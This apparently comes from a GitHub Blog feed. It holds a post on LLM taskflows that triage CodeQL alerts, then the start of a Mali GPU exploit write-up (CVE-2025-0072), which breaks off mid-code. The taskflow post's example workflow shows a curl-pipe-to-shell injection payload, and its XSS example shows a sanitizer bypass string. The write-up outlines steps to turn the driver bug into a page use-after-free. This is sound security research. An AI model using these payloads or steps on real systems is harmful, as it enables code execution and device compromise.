For example, when triaging alerts for GitHub Actions, false positives often result from some checks that have been put in place to make sure that only repo maintainers can trigger a vulnerable workflow, or that the vulnerable workflow is disabled in the configuration. These access control checks come in many different forms without an easily identifiable code pattern to match and are thus very difficult for a static analyzer like CodeQL to detect. However, a human auditor with general knowledge of code semantics can often identify them easily, so we expect an LLM to be able to identify these access control checks and remove false positives.
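To illustrate, such an access control check often looks something like the following in a workflow file (a hypothetical sketch; real-world variants differ widely, which is exactly why they are hard to match statically):

```yaml
jobs:
  privileged-job:
    # The privileged job only runs when the PR author is a maintainer.
    # Checks like this come in many shapes with no single code pattern.
    if: contains(fromJSON('["OWNER", "MEMBER", "COLLABORATOR"]'), github.event.pull_request.author_association)
    runs-on: ubuntu-latest
    steps:
      - run: echo "running for a trusted actor"
```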

Over the course of a couple of months, we’ve tested our taskflows with a few CodeQL rules using mostly Claude Sonnet 3.5. We have identified a number of real, exploitable vulnerabilities. The taskflows do not perform an “end-to-end” analysis, but rather produce a bug report with all the details and conclusions so that we can quickly verify the results. We did not instruct the LLM to validate the results by creating an exploit nor provide any runtime environment for it to test its conclusion. The results, however, remain fairly accurate even without an automated validation step and we were able to remove false positives in the CodeQL queries quickly.

The rules are chosen based on our own experience of triaging these types of alerts and whether the list of tasks can be formulated into clearly defined instructions for LLMs to consume. 

General taskflow design

Taskflows generally consist of tasks that are divided into a few different stages. In the first stage, the tasks collect various bits of information relevant to the alert. This information is then passed to an auditing stage, where the LLM looks for common causes of false positives from our own experience of triaging alerts. After the auditing stage, a bug report is generated using the information gathered. In the actual taskflows, the information gathering and audit stage are sometimes combined into a single task, or they may be separate tasks, depending on how complex the task is.

To ensure that the generated report has sufficient information for a human auditor to make a decision, an extra step checks that the report has the correct formatting and contains the correct information. After that, a GitHub Issue is created, ready to be reviewed. 

Creating a GitHub Issue not only makes it easy for us to review the results, but also provides a way to extend the analysis. After reviewing and checking the issues, we often find that there are causes for false positives that we missed during the auditing process. Also, if the agent determines that the alert is valid, but the human reviewer disagrees and finds that it’s a false positive for a reason that was unknown to the agent so far, the human reviewer can document this as an alert dismissal reason or issue comment. When the agent analyzes similar cases in the future, it will be aware of all the past analysis stored in those issues and alert dismissal reasons, incorporate this new intelligence in its knowledge base, and be more effective at detecting false positives.

Information collection

During this stage, we instruct the LLM (examples are provided in the Triage examples section below) to collect relevant information about the alert, taking into account the threat model and human knowledge of the alert in general. For example, in the case of GitHub Actions alerts, it will look at what permissions are set in the GitHub workflow file, what events trigger the workflow, whether the workflow is disabled, etc. These generally involve independent tasks that follow simple, well-defined instructions to ensure the information collected is consistent. For example, checking whether a GitHub workflow is disabled involves making a GitHub API call via an MCP server.

To ensure that the information collected is accurate and to reduce hallucination, we instruct the LLM to include precise references to the source code that includes both file and line number to back up the information it collected:

You should include the line number where the untrusted code is invoked, as well as the untrusted code or package manager that is invoked in the notes.

Each task then stores the information it collected in audit notes, which act as a running commentary on an alert. Once a task is completed, its notes are serialized to a database, to which the next task appends its own notes when it is done.

Two tasks in order, displaying which notes are added to the general notes in each step. In the trigger analysis step, the notes added include triggers, permissions, and secrets, among others. The second task, “audit injection point,” potentially adds notes such as sanitizers.

In general, each of the information gathering tasks is independent of each other and does not need to read each other’s notes. This helps each task to focus on its own scope without being distracted by previously collected information.

The end result is a “bag of information” in the form of notes associated with an alert that is then passed to the auditing tasks.

Audit issue

At this stage, the LLM goes through the information gathered and performs a list of specific checks to reject alert results that turned out to be false positives. For example, when triaging a GitHub Actions alert, we may have collected information about the events that trigger the vulnerable workflow. In the audit stage, we’ll check if these events can be triggered by an attacker or if they run in a privileged context. After this stage, a lot of the false positives that are obvious to a human auditor will be removed.

Decision-making and report generation

For alerts that have made it through the auditing stage, the next step is to create a bug report using the information gathered, as well as the reasoning for the decision at the audit stage. Again, in our prompt, we are being very precise about the format of the report and what information we need. In particular, we want it to be concise but also include information that makes it easy for us to verify the results, with precise code references and code blocks.

The report generated uses the information gathered from the notes in previous stages and only looks at the source code to fetch code snippets that are needed in the report. No further analysis is done at this stage. Again, the very strict and precise nature of the tasks reduces the amount of hallucination.

Report validation and issue creation

After the report is written, we instruct the LLM to check the report to ensure that all the relevant information is contained in the report, as well as the consistency of the information:

Check that the report contains all the necessary information:
- This criteria only applies if the workflow containing the alert is a reusable action AND has no high privileged trigger. 
You should check it with the relevant tools in the gh_actions toolbox.
If that's not the case, ignore this criteria.
In this case, check that the report contains a section that lists the vulnerable action users. 
If there isn't any vulnerable action users and there is no high privileged trigger, then mark the alert as invalid and using the alert_id and repo, then remove the memcache entry with the key {{ RESULT_key }}.

Missing or inconsistent information often indicates hallucinations or other causes of false positives (for example, not being able to track down an attacker controlled input). In either case, we dismiss the report.

If the report contains all the information and is consistent, then we open a GitHub Issue to track the alert.

Issue review and repo-specific knowledge

The GitHub Issue created in the previous step contains all the information needed to verify the issue, with code snippets and references to lines and files. This provides a kind of “checkpoint” and a summary of the information that we have, so that we can easily extend the analysis.

In fact, after creating the issue, we often find that there are repo-specific permission checks or sanitizers that render the issue a false positive. We are able to incorporate this knowledge by creating taskflows that review these issues with repo-specific knowledge added in the prompts. One approach that we’ve experimented with is to collect dismissal reasons for alerts in a repo and instruct the LLM to take these dismissal reasons into account when reviewing the GitHub issue. This allows us to remove false positives due to reasons specific to a repo.

Image showing LLM output that dismisses an alert.

In this case, the LLM is able to identify the alert as false positive after taking into account a custom check-run permission check that was recorded in the alert dismissal reasons.

Triage examples and results

In this section, we’ll give some examples of what these taskflows look like in practice. In particular, we’ll show taskflows for triaging some GitHub Actions and JavaScript alerts.

GitHub Actions alerts

The specific Actions alerts that we triaged are checkout of untrusted code in a privileged context and code injection.

The triaging of these queries shares a lot of similarities. For example, both involve checking the workflow’s triggering events and permissions, and tracking workflow callers. In fact, the main differences involve local analysis of specific details of the vulnerabilities. For code injection, this involves whether the injected code has been sanitized, how the expression is evaluated, and whether the input is truly arbitrary (for example, a pull request ID is unlikely to cause a code injection issue). For untrusted checkout, this involves whether there is a valid code execution point after the checkout.

Since many elements in these taskflows are the same, we’ll use the code injection triage taskflow as an example. Note that because these taskflows have a lot in common, we made heavy use of reusable features in the seclab-taskflow-agent, such as prompts and reusable tasks.

When manually triaging GitHub Actions alerts for these rules, we commonly run into false positives because of:

  1. Vulnerable workflow doesn’t run in a privileged context. This is determined by the events that trigger the vulnerable workflow. For example, a workflow triggered by the pull_request_target runs in a privileged context, while a workflow triggered by the pull_request event does not. This can usually be determined by simply looking at the workflow file.
  2. Vulnerable workflow disabled explicitly in the repo. This can be checked easily by checking the workflow settings in the repo.
  3. Vulnerable workflow explicitly restricts permissions and does not use any secrets, in which case there is little privilege to gain.
  4. Vulnerability specific issues, such as invalid user input or sanitizer in the case of code injection and the absence of a valid code execution point in the case of untrusted checkout.
  5. Vulnerable workflow is a reusable workflow but not reachable from any workflow that runs in privileged context.

Very often, triaging these alerts involves many simple but tedious checks like the ones listed above, and an alert can be determined to be a false positive very quickly by one of the above criteria. We therefore model our triage taskflows based on these criteria. 
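For contrast, a hypothetical workflow that passes all of these checks, and that the taskflow should therefore report, could look like this:

```yaml
name: greet
# pull_request_target runs in a privileged context with secret access,
# so criteria 1-3 do not filter this alert out.
on: pull_request_target
permissions:
  contents: write
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # The PR title is attacker-controlled and is interpolated into the
      # shell script before it runs: a title such as
      # a"; curl https://evil.example | sh; echo "
      # injects arbitrary commands into the privileged job.
      - run: echo "Thanks for the PR: ${{ github.event.pull_request.title }}"
```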

So, our action-triage taskflows consist of the following tasks during information gathering and the auditing stage:

  • Workflow trigger analysis: This stage performs both information gathering and auditing. It first collects events that trigger the vulnerable workflow, as well as permission and secrets that are used in the vulnerable workflow. It also checks whether the vulnerable workflow is disabled in the repo. All information is local to the vulnerable workflow itself. This information is stored in running notes which are then serialized to a database entry. As the task is simple and involves only looking at the vulnerable workflow, preliminary auditing based on the workflow trigger is also performed to remove some obvious false positives. 
  • Code injection point analysis: This is another task that only analyzes the vulnerable workflow and combines information gathering and audit in a single task. This task collects information about the location of the code injection point and the user input that is injected. It also performs local auditing to check whether a user input is a valid injection risk and whether it has a sanitizer.
  • Workflow user analysis: This performs a simple caller analysis that looks for the caller of the vulnerable workflow. As it can potentially retrieve and analyze a large number of files, this step is divided into two main tasks that perform information gathering and auditing separately. In the information gathering task, callers of the vulnerable workflow are retrieved and their trigger events, permissions, use of secrets are recorded in the notes. This information is then used in the auditing task to determine whether the vulnerable workflow is reachable by an attacker.

Each of these tasks is applied to the alert and at each step, false positives are filtered out according to the criteria in the task.

After the information gathering and audit stage, our notes will generally include information such as the events that trigger the vulnerable workflow, permissions and secrets involved, and (in case of a reusable workflow) other workflows that use the vulnerable workflow as well as their trigger events, permissions, and secrets. This information will form the basis for the bug report. As a sanity check to ensure that the information collected so far is complete and consistent, the review_report task is used to check for missing or inconsistent information before a report is created. 

After that, the create_report task is used to create a bug report which will form the basis of a GitHub Issue. Before creating an issue, we double check that the report contains the necessary information and conforms to the format that we required. Missing information or inconsistencies are likely the results of some failed steps or hallucinations and we reject those cases.

The following diagram illustrates the main components of the triage_actions_code_injection taskflow:

Seven tasks of a taskflow connected in order with arrows: fetch alerts, trigger analysis, injection point analysis, workflow user analysis, review notes, create bug report and review bug report. All tasks but fetch alerts symbolize how they either iterate over alerts or alert notes.

We then create GitHub Issues using the create_issue_actions taskflow. As mentioned before, the GitHub Issues created contain sufficient information and code references to verify the vulnerability quickly, as well as serving as a summary for the analysis so far, allowing us to continue further analysis using the issue. The following shows an example of an issue that is created:

Image showing an issue created by the LLM.

In particular, we can use GitHub Issues and alert dismissal reasons as a means to incorporate repo-specific security measures and to further the analysis. To do so, we use the review_actions_injection_issues taskflow to first collect alert dismissal reasons from the repo. These dismissal reasons are then checked against the alert stated in the GitHub Issue. In this case, we simply use the issue as the starting point and instruct the LLM to audit the issue and check whether any of the alert dismissal reasons applies to the current issue. Since the issue contains all the relevant information and code references for the alert, the LLM is able to use the issue and the alert dismissal reasons to further the analysis and discover more false positives. The following shows an alert that is rejected based on the dismissal reasons:

Image showing LLM output of reasons to reject an alert after taking the dismissal reasons into account.

The following diagram illustrates the main components of the issue creation and review taskflows:

Five tasks separated in two swim lanes: the first swim lane named “create action issues” depicts tasks that are used for the issue creation taskflow starting with dismissing false positives and continuing with the tasks for issue creation for true and false positives. The second swim lane is titled “review action issues” and contains the tasks “collect alert dismissal reasons” and “review issues based on dismissal reasons.

JavaScript alerts

Similarly to triaging Actions alerts, we also triaged code scanning alerts for the JavaScript/TypeScript languages, albeit to a lesser extent. In the JavaScript world, we triaged code scanning alerts for the client-side cross-site scripting CodeQL rule (js/xss).

The client-side cross-site scripting alerts have more variety with regards to their sources, sinks, and data flows when compared to the GitHub Actions alerts.

The prompts for analyzing those XSS vulnerabilities are focused on helping the person responsible for triage make an educated decision, not making the decision for them. This is done by highlighting the aspects that seem to make a given alert exploitable by an attacker and, more importantly, what likely prevents the exploitation of a given potential issue. Other than that, the taskflows follow a similar scheme as described in the GitHub Actions alerts section.

While triaging XSS alerts manually, we’ve often identified false positives due to these reasons:

  • Custom or unrecognized sanitization functions (e.g., using regexes) that the SAST tool cannot verify.
  • Reported sources that are likely unreachable in practice (e.g., would require an attacker to send a message directly from the webserver).
  • Untrusted data flowing into potentially dangerous sinks, whose output is then only used in a non-exploitable way.
  • The SAST tool not knowing the full context where the given untrusted data ends up.

Based on these false positives, the prompts in the relevant taskflow, or even in the active personality, were extended and adjusted. If you encounter recurring false positives in a project you are auditing, it makes sense to extend the prompt so that such false positives are correctly marked (and likewise if alerts for certain sources/sinks are not considered vulnerabilities).
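The first bullet is the most common case: a hand-rolled sanitizer that a SAST tool cannot prove safe, and which often isn’t. A contrived example of the pattern (our own sketch, not from any triaged project):

```javascript
// Hypothetical regex-based sanitizer of the kind a SAST tool cannot
// reason about: it strips <script> tags but nothing else.
function naiveSanitize(input) {
  return input.replace(/<script[\s\S]*?<\/script>/gi, '');
}

// Stripped as intended:
console.log(naiveSanitize('<script>alert(1)</script>hello')); // "hello"

// Bypassed by an event-handler payload that contains no <script> tag;
// still dangerous if the result is assigned to innerHTML:
console.log(naiveSanitize('<img src=x onerror=alert(1)>'));
```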

In the end, after executing the taskflows triage_js_ts_client_side_xss and create_issues_js_ts, the alert would result in GitHub issues such as:

A screenshot of a GitHub Issue titled 'Code scanning alert #72 triage report for js/xss,' showing two lists with reasons that make an alert and exploitable vulnerability or not.

While this is a sample of an alert worth following up on (which turned out to be a true positive, being exploitable using a javascript: URL), alerts that the taskflow agent decided were false positives get their issues labeled with “FP” (for false positive):

A screenshot of a GitHub Issue titled 'Code scanning alert #1694 triage report for js/xss.' While it would show factors that make an alert exploitable it shows none, because the taskflow identified none. However, the issue shows a list of 7 items describing why the vulnerability is not exploitable.

Taskflows development tips

In this section, we share some of our experiences from working on these taskflows and what we found useful in developing them. We hope these tips will help others create their own taskflows.

Use of database to store intermediate state

While developing a taskflow with multiple tasks, we sometimes encounter problems in tasks that run at a later stage. These can be simple software problems, such as API call failures, MCP server bugs, prompt-related problems, token problems, or quota problems.

By keeping tasks small and storing the results of each task in a database, we avoided rerunning lengthy tasks when a failure happened. When a task in a taskflow fails, we simply rerun the taskflow from the failed task and reuse the results from earlier tasks that are stored in the database. Apart from saving us time when a task failed, this also helped us to isolate the effects of each task and to tweak each task using the database created by the previous tasks as a starting point.

Breaking down complex tasks into smaller tasks

When we were developing the triage taskflows, the models that we used did not handle large context and complex tasks very well. When trying to perform complex and multiple tasks within the same context, we often ran into problems such as tasks being skipped or instructions not being followed.

To counter that, we divided tasks into smaller, independent tasks. Each started with a fresh new context. This helped reduce the context window size and alleviated many of the problems that we had.

One particular example is the use of templated repeat_prompt tasks, which loop over a list of tasks and start a new context for each of them. By doing this, instead of going through a list in the same prompt, we ensured that every single task was performed, while the context of each task was kept to a minimum.

A task named “audit results,” which exemplifies the “repeat prompt” feature. It depicts this with three boxes of the same size called 'audit result #1,' 'audit result #2,' and 'audit result #n,' with an ellipsis displayed between the #2 and #n boxes.

An added benefit is that we are able to tweak and debug the taskflows with more granularity. By having small tasks and storing the results of each task in a database, we can easily split out part of a taskflow and run it on its own.

Delegate to MCP server whenever possible

Initially, when checking and gathering information, such as workflow triggers, from the source code, we simply incorporated instructions in prompts because we thought the LLM should be able to gather the information from the source code. While this worked most of the time, we also noticed some inconsistencies due to the non-deterministic nature of the LLM. For example, the LLM would sometimes only record a subset of the events that trigger the workflow, or it would make inconsistent conclusions about whether a trigger runs the workflow in a privileged context.

Since this information gathering and these checks can easily be performed programmatically, we ended up creating tools in the MCP servers to gather the information and perform the checks. This led to a much more consistent outcome.

By moving most of the tasks that can easily be done programmatically into MCP server tools, while leaving the more complex logical reasoning tasks, such as finding permission checks, to the LLM, we were able to leverage the power of LLMs while keeping the results consistent.
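A sketch of the kind of check we moved out of prompts and into tool code (simplified for illustration; a real MCP tool would use a proper YAML parser rather than regexes):

```javascript
// Extract the events that trigger a workflow and flag privileged ones
// deterministically, rather than asking the LLM to read them out.
const PRIVILEGED = new Set(['pull_request_target', 'workflow_run', 'issue_comment']);

function workflowTriggers(workflowYaml) {
  // Naive extraction assuming a block-style, two-space-indented `on:` key.
  const block = workflowYaml.match(/^on:\s*\n((?:[ \t]+\S.*\n?)+)/m);
  if (!block) return [];
  return [...block[1].matchAll(/^ {2}([\w-]+):/gm)].map((m) => m[1]);
}

const wf = 'name: ci\non:\n  pull_request_target:\n    branches: [main]\n  push:\n';
const events = workflowTriggers(wf);
console.log(events, events.some((e) => PRIVILEGED.has(e)));
// → [ 'pull_request_target', 'push' ] true
```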

Reusable taskflow to apply tweaks across taskflows

As we were developing the triage taskflows, we realized that many tasks can be shared between different triage taskflows. To make sure that tweaks in one taskflow can be applied to the rest, and to reduce the amount of copy and paste, we needed a way to refactor the taskflows and extract reusable components.

We added features like reusable tasks and prompts. Using these features allowed us to reuse and apply changes consistently across different taskflows.

Configuring models across taskflows

As LLMs are constantly developing and new versions are released frequently, it soon became apparent that we needed a way to update model version numbers across taskflows. So, we added a model configuration feature that allows us to change models across taskflows, which is useful when a model version needs updating or when we just want to experiment and rerun the taskflows with a different model.

Closing

In this post we’ve shown how we created taskflows for the seclab-taskflow-agent to triage code scanning alerts. 

By breaking the triage down into precise, specific tasks, we were able to automate many of the more repetitive steps with an LLM. By setting out clear and precise criteria in the prompts and requiring the LLM to include code references in its answers, the LLM was able to perform the tasks as instructed while keeping hallucination to a minimum. This allows us to leverage the power of LLMs to triage alerts and greatly reduces the number of false positives without the need to validate the alerts dynamically.

As a result, we were able to discover ~30 real-world vulnerabilities from CodeQL alerts after running the triage taskflows.

The discussed taskflows are published in our repo and we’re looking forward to seeing what you’re going to build using them! More recently, we’ve also done some further experiments in the area of AI-assisted code auditing and vulnerability hunting, so stay tuned for what’s to come!

Get the guide to setting up the GitHub Security Lab Taskflow Agent >


Disclaimers: 

  1. When we use these taskflows to report vulnerabilities, our researchers review carefully all generated output before sending the report. We strongly recommend you do the same. 
  2. Note that running the taskflows can result in many tool calls, which can easily consume a large amount of quota.
  3. The taskflows may create GitHub Issues. Please be considerate and seek the repo owner’s consent before running them on somebody else’s repo.

The post AI-supported vulnerability triage with the GitHub Security Lab Taskflow Agent appeared first on The GitHub Blog.

]]>
Bypassing MTE with CVE-2025-0072 https://github.blog/security/vulnerability-research/bypassing-mte-with-cve-2025-0072/ Fri, 23 May 2025 10:00:00 +0000 https://github.blog/?p=88178 In this post, I’ll look at CVE-2025-0072, a vulnerability in the Arm Mali GPU, and show how it can be exploited to gain kernel code execution even when Memory Tagging Extension (MTE) is enabled.

The post Bypassing MTE with CVE-2025-0072 appeared first on The GitHub Blog.

]]>

Memory Tagging Extension (MTE) is an advanced memory safety feature that is intended to make memory corruption vulnerabilities almost impossible to exploit. But no mitigation is ever completely airtight—especially in kernel code that manipulates memory at a low level.

Last year, I wrote about CVE-2023-6241, a vulnerability in Arm’s Mali GPU driver, which enabled an untrusted Android app to bypass MTE and gain arbitrary kernel code execution. In this post, I’ll walk through CVE-2025-0072: a newly patched vulnerability that I also found in Arm’s Mali GPU driver. Like the previous one, it enables a malicious Android app to bypass MTE and gain arbitrary kernel code execution.

I reported the issue to Arm on December 12, 2024. It was fixed in Mali driver version r54p0, released publicly on May 2, 2025, and included in Android’s May 2025 security update. The vulnerability affects devices with newer Arm Mali GPUs that use the Command Stream Frontend (CSF) architecture, such as Google’s Pixel 7, 8, and 9 series. I developed and tested the exploit on a Pixel 8 with kernel MTE enabled, and I believe it should work on the 7 and 9 as well with minor modifications.

What follows is a deep dive into how CSF queues work, the steps I used to exploit this bug, and how it ultimately bypasses MTE protections to achieve kernel code execution.

How CSF queues work—and how they become dangerous

Arm Mali GPUs with the CSF feature communicate with userland applications through command queues, implemented in the driver as kbase_queue objects. The queues are created by using the KBASE_IOCTL_CS_QUEUE_REGISTER ioctl. To use the kbase_queue that is created, it first has to be bound to a kbase_queue_group, which is created with the KBASE_IOCTL_CS_QUEUE_GROUP_CREATE ioctl. A kbase_queue can be bound to a kbase_queue_group with the KBASE_IOCTL_CS_QUEUE_BIND ioctl. When binding a kbase_queue to a kbase_queue_group, a handle is created from get_user_pages_mmap_handle and returned to the user application.

int kbase_csf_queue_bind(struct kbase_context *kctx, union kbase_ioctl_cs_queue_bind *bind)
{
	...
	group = find_queue_group(kctx, bind->in.group_handle);
	queue = find_queue(kctx, bind->in.buffer_gpu_addr);
	...
	ret = get_user_pages_mmap_handle(kctx, queue);
	if (ret)
		goto out;
	bind->out.mmap_handle = queue->handle;
	group->bound_queues[bind->in.csi_index] = queue;
	queue->group = group;
	queue->group_priority = group->priority;
	queue->csi_index = (s8)bind->in.csi_index;
	queue->bind_state = KBASE_CSF_QUEUE_BIND_IN_PROGRESS;

out:
	rt_mutex_unlock(&kctx->csf.lock);

	return ret;
}

In addition, mutual references are stored between the kbase_queue_group and the queue. Note that when the call finishes, queue->bind_state is set to KBASE_CSF_QUEUE_BIND_IN_PROGRESS, indicating that the binding is not completed. To complete the binding, the user application must call mmap with the handle returned from the ioctl as the file offset. This mmap call is handled by kbase_csf_cpu_mmap_user_io_pages, which allocates GPU memory via kbase_csf_alloc_command_stream_user_pages and maps it to user space.

int kbase_csf_alloc_command_stream_user_pages(struct kbase_context *kctx, struct kbase_queue *queue)
{
	struct kbase_device *kbdev = kctx->kbdev;
	int ret;

	lockdep_assert_held(&kctx->csf.lock);

	ret = kbase_mem_pool_alloc_pages(&kctx->mem_pools.small[KBASE_MEM_GROUP_CSF_IO],
					 KBASEP_NUM_CS_USER_IO_PAGES, queue->phys, false,                 //<------ 1.
					 kctx->task);
  ...
	ret = kernel_map_user_io_pages(kctx, queue);
  ...
	get_queue(queue);
	queue->bind_state = KBASE_CSF_QUEUE_BOUND;
	mutex_unlock(&kbdev->csf.reg_lock);

	return 0;
  ...
}

At 1. in the above snippet, kbase_mem_pool_alloc_pages is called to allocate memory pages from the GPU memory pool; their addresses are then stored in the queue->phys field. These pages are then mapped to user space and the bind_state of the queue is set to KBASE_CSF_QUEUE_BOUND. The pages are only freed when the mmapped area is unmapped from user space. In that case, kbase_csf_free_command_stream_user_pages is called to free the pages via kbase_mem_pool_free_pages.

void kbase_csf_free_command_stream_user_pages(struct kbase_context *kctx, struct kbase_queue *queue)
{
	kernel_unmap_user_io_pages(kctx, queue);

	kbase_mem_pool_free_pages(&kctx->mem_pools.small[KBASE_MEM_GROUP_CSF_IO],
				  KBASEP_NUM_CS_USER_IO_PAGES, queue->phys, true, false);
  ...
}

This frees the pages stored in queue->phys, and because this only happens when the pages are unmapped from user space, it prevents the pages from being accessed after they are freed.
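The two-phase bind described above (the ioctl only marks the bind as in progress and hands back an mmap handle; the subsequent mmap completes it) can be sketched as a small state machine. This is a toy Python model for illustration only: the names mirror the driver's, but none of this is real driver code.

```python
# Toy state machine for the two-phase CSF queue bind. The constants mirror
# the driver's bind_state values in name only.
UNBOUND, BIND_IN_PROGRESS, BOUND = "UNBOUND", "BIND_IN_PROGRESS", "BOUND"

class Queue:
    def __init__(self):
        self.bind_state = UNBOUND
        self.group = None
        self.handle = None

def queue_bind(queue, group):
    """Models kbase_csf_queue_bind: records the group, creates a handle."""
    if queue.group is not None:
        raise ValueError("already bound")
    queue.group = group
    queue.handle = object()          # stands in for get_user_pages_mmap_handle
    queue.bind_state = BIND_IN_PROGRESS
    return queue.handle

def mmap_user_io_pages(queue, handle):
    """Models the mmap call that completes the bind."""
    if handle is not queue.handle or queue.bind_state != BIND_IN_PROGRESS:
        raise ValueError("bad handle or state")
    queue.bind_state = BOUND

q = Queue()
h = queue_bind(q, "group")
assert q.bind_state == BIND_IN_PROGRESS   # the ioctl alone does not complete it
mmap_user_io_pages(q, h)
assert q.bind_state == BOUND
```

The point of the model is that the queue carries the bind state and handle between the two calls; it is precisely this per-queue state that the rebinding sequence below manipulates.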

An exploit idea

The interesting part begins when we ask: what happens if we can modify queue->phys after mapping the pages into user space? For example, if I can trigger kbase_csf_alloc_command_stream_user_pages again to store newly allocated pages in queue->phys, map them to user space, and then unmap the previously mapped region, kbase_csf_free_command_stream_user_pages will be called to free the pages in queue->phys. However, because queue->phys has now been overwritten with the newly allocated pages, I end up in a situation where I free the new pages while unmapping an old region:

A diagram demonstrating how to free the new pages while unmapping an old region.

In the above figure, the right column shows mappings in user space: green rectangles are mapped, while gray ones are unmapped. The left column shows the backing pages stored in queue->phys. The new queue->phys pages are those currently stored in queue->phys, while the old queue->phys pages were stored previously but have been replaced by the new ones. Green indicates that the pages are alive, while red indicates that they are freed. After overwriting queue->phys and unmapping the old region, the new queue->phys pages are freed instead, while still being mapped to the new user region. This means that user space will have access to the freed new queue->phys pages, which gives me a page use-after-free vulnerability.

The vulnerability

So let’s take a look at how to achieve this situation. The first obvious thing to try is to see if I can bind a kbase_queue multiple times using the KBASE_IOCTL_CS_QUEUE_BIND ioctl. This, however, is not possible because the queue->group field is checked before binding:

int kbase_csf_queue_bind(struct kbase_context *kctx, union kbase_ioctl_cs_queue_bind *bind)
{
  ...
	if (queue->group || group->bound_queues[bind->in.csi_index])
		goto out;
  ...
}

After a kbase_queue is bound, its queue->group is set to the kbase_queue_group that it binds to, which prevents the kbase_queue from binding again. Moreover, once a kbase_queue is bound, it cannot be unbound via any ioctl. It can be terminated with KBASE_IOCTL_CS_QUEUE_TERMINATE, but that will also delete the kbase_queue. So if rebinding from the queue is not possible, what about trying to unbind from a kbase_queue_group? For example, what happens if a kbase_queue_group gets terminated with the KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE ioctl? When a kbase_queue_group terminates, as part of the clean up process, it calls kbase_csf_term_descheduled_queue_group to unbind queues that it bound to:

void kbase_csf_term_descheduled_queue_group(struct kbase_queue_group *group)
{
  ...
	for (i = 0; i < max_streams; i++) {
		struct kbase_queue *queue = group->bound_queues[i];

		/* The group is already being evicted from the scheduler */
		if (queue)
			unbind_stopped_queue(kctx, queue);
	}
  ...
}

This then resets the queue->group field of the kbase_queue that gets unbound:

static void unbind_stopped_queue(struct kbase_context *kctx, struct kbase_queue *queue)
{
  ...
	if (queue->bind_state != KBASE_CSF_QUEUE_UNBOUND) {
    ...
		queue->group->bound_queues[queue->csi_index] = NULL;
		queue->group = NULL;
    ...
		queue->bind_state = KBASE_CSF_QUEUE_UNBOUND;
	}
}

In particular, this now allows the kbase_queue to bind to another kbase_queue_group. This means I can now create a page use-after-free with the following steps:

  1. Create a kbase_queue and a kbase_queue_group, and then bind the kbase_queue to the kbase_queue_group.
  2. Create GPU memory pages for the user io pages in the kbase_queue and map them to user space using a mmap call. These pages are then stored in the queue->phys field of the kbase_queue.
  3. Terminate the kbase_queue_group, which also unbinds the kbase_queue.
  4. Create another kbase_queue_group and bind the kbase_queue to this new group.
  5. Create new GPU memory pages for the user io pages in this kbase_queue and map them to user space. These pages now overwrite the existing pages in queue->phys.
  6. Unmap the user space memory that was mapped in step 2. This then frees the pages in queue->phys and removes the user space mapping created in step 2. However, the pages that are freed are now the memory pages created and mapped in step 5, which are still mapped to user space.
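The six steps above can be condensed into a toy Python simulation of the page bookkeeping. This is illustrative only: it models queue->phys as a tuple of page numbers and ignores everything else in the driver.

```python
# Toy model of the queue->phys page use-after-free: rebinding the queue
# overwrites queue.phys, so unmapping the old region frees the new pages.
class Queue:
    def __init__(self):
        self.phys = None    # backing pages currently recorded on the queue
        self.group = None

class Region:
    """A user-space mapping and the pages it was created from."""
    def __init__(self, pages):
        self.pages = pages
        self.mapped = True

alive = set()               # pages currently allocated
next_page = [0]

def alloc_pages(n):
    pages = tuple(range(next_page[0], next_page[0] + n))
    next_page[0] += n
    alive.update(pages)
    return pages

def bind_and_mmap(queue, group):
    # Bind + mmap: allocates fresh pages and *overwrites* queue.phys.
    queue.group = group
    queue.phys = alloc_pages(2)
    return Region(queue.phys)

def unmap(queue, region):
    # kbase_csf_free_command_stream_user_pages frees queue.phys,
    # not the pages the region was actually created from.
    for p in queue.phys:
        alive.discard(p)
    region.mapped = False

q = Queue()
old_region = bind_and_mmap(q, "group1")   # steps 1-2
q.group = None                            # step 3: group terminated, queue unbound
new_region = bind_and_mmap(q, "group2")   # steps 4-5: queue.phys overwritten
unmap(q, old_region)                      # step 6: frees the *new* pages

assert new_region.mapped                                  # still mapped...
assert all(p not in alive for p in new_region.pages)      # ...but freed
assert all(p in alive for p in old_region.pages)          # old pages leak
```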

This, in particular, means that the pages that are freed in step 6 of the above can still be accessed from the user application. By using a technique that I used previously, I can reuse these freed pages as page table global directories (PGD) of the Mali GPU.

To recap, let’s take a look at how the backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
    struct tagged_addr *pages, bool partial_allowed)
{
    ...
  /* Get pages from this pool */
  while (nr_from_pool--) {
    p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
  }
    ...
  if (i != nr_4k_pages && pool->next_pool) {
    /* Allocate via next pool */
    err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
        nr_4k_pages - i, pages + i, partial_allowed);
        ...
  } else {
    /* Get any remaining pages from kernel */
    while (i != nr_4k_pages) {
      p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
  }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is done in tiers. First, the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the same happens in the opposite direction: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context; if that pool is full, it tries to return the remaining pages to pool->next_pool. If the next pool is also full, the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in my post “Corrupting memory without memory corruption”, pool->next_pool is a memory pool managed by the Mali driver and shared by all kbase_context objects. It is also used for allocating the page table global directories (PGDs) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (Read the details of how to achieve this.)
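The tiered behavior of these two functions, and why it matters for the exploit, can be modeled with a toy Python sketch. The pool structure, capacities, and page numbering here are all made up for illustration; the point is that a page freed from a full context pool lands in the shared next_pool, from which PGD allocations are also served.

```python
kernel_counter = [1000]   # stand-in for the buddy allocator

def pool_alloc(pool, n):
    """Allocate n pages: current pool first, then next_pool, then the kernel."""
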